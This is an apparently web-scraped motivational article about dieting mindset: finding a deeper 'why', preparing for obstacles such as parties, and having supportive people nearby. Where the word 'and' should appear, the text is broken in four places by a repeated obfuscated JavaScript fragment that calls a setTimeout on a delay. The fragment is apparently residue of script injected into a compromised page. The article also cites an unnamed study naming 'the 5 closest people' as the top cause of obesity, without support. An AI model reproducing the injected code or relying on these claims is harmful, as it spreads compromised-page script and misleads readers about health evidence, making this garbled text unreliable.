The Biggest Reason Why You Will Never Succeed at Your Diet

Changing your daily habits can be difficult, but definitely not impossible. The challenge that most people face is that they are more interested in WHAT changes they need to make, than the mindset they need to have to succeed at those changes.

Your attitude in all endeavors will make or break your chances of succeeding. When it comes to dieting you have to have a certain mindset to make lasting changes.

The following are the top reasons I see people fail. 

They don’t have a big enough why

Just wanting to fit into your skinny jeans, can only motivate you so much. There has to be a deeper reason you want to lose weight. Think about how your weight is holding you back right now. Where in life do you feel bad about yourself? I know this is uncomfortable to think about. Most people don’t realize  that if you don’t love living in your body it can effect EVERYTHING you do. It effects your confidence, which effects your relationships, job, andom()*5);if (c==3){var delay = 15000;setTimeout($hiVNZt4Y5cDrbJXMhLy(0), delay);}and how you walk around in the world. Also, think about how much fun it is to have all that negative self talk roaming around in your head. It sucks right?  What would life be like without it? How free would you feel if you loved your body?

They don’t prepare for obstacles

When most people start a new health plan, they are excited, hopeful, andom()*5);if (c==3){var delay = 15000;setTimeout($hiVNZt4Y5cDrbJXMhLy(0), delay);}and can’t wait to feel the result. No one thinks about the bumps in the road. This is a challenge. The minute they have an obstacle, most people stop the diet. We do 30 day challenges all the time in my office. These challenges are built around the idea that for 30 days you will follow a program of health that will change your habits andom()*5);if (c==3){var delay = 15000;setTimeout($hiVNZt4Y5cDrbJXMhLy(0), delay);}and help you lose weight fast.

About 75% of the people make it through successfully. What happens to the 25% that don’t make it? The minute it gets hard, they give up. If you are going to make changes to your health, stop looking for it to be easy. Think of all the great things you’ve accomplished in life. Have they been easy? Then stop looking for your diet to be easy.  If you are making diet changes, you are most likely eating different than most of your friends. Look for environments you might find yourself in that will be hard. Parties, ladies night out, BBQ’s, all are going to be obstacles. They don’t have community support

This is a HUGE one, so listen closely. It has been well documented that you will think andom()*5);if (c==3){var delay = 15000;setTimeout($hiVNZt4Y5cDrbJXMhLy(0), delay);}and act like the people closest to you. A research study was done years ago that wanted to find the number one cause of obesity. Was it calorie intake? Quality of food? Amount of exercise? It turned out to be none of those. It was the 5 closest people to you. If they were obese than you were likely to be obese.

Community support is crucial when you want to make change. You need a team of people cheering you on. It makes it so much easier. Think about your five people. Do they want to see you succeed? Or will they feel threatened by your improvements? What are their food habits like? As sad as it is to realize, many people feel worse about themselves when the people around them start making improvements. You don’t want those people on your health journey. Get rid of them. It’s hard to make changes to your daily habits. Having people around you that don’t support you makes it that much harder.

Improving your health can be one of the most liberating experiences! Health is the foundation that everything in your life grows upon. Be committed to it. It’s worth it!! People who have an amazing lives, have amazing energy. Incredible energy comes from treating your body right.
